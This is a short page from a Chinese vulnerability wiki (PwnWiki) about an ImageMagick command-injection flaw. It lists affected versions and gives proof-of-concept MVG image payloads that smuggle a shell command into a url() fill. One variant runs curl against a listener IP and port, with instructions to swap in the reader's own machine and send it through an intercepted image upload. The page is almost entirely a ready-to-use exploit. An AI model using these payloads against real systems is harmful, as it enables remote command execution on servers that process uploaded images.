免费、自由、人人可编辑的漏洞库--PwnWiki.com
,
漏洞影响
mageMagick 6.5.7-8
ImageMagick 6.7.7-10
<6.9.3-9 released
POC
push graphic-context viewbox 0 0 640 480 fill 'url(https://"| command")' pop graphic-context
图片上传点,抓包
push graphic-context viewbox 0 0 640 480 fill 'url(https://"| curl 172.16.20.108:8888")' pop graphic-context
修改IP和端口为监听机器的IP和端口。
免费、自由、人人可编辑的漏洞库
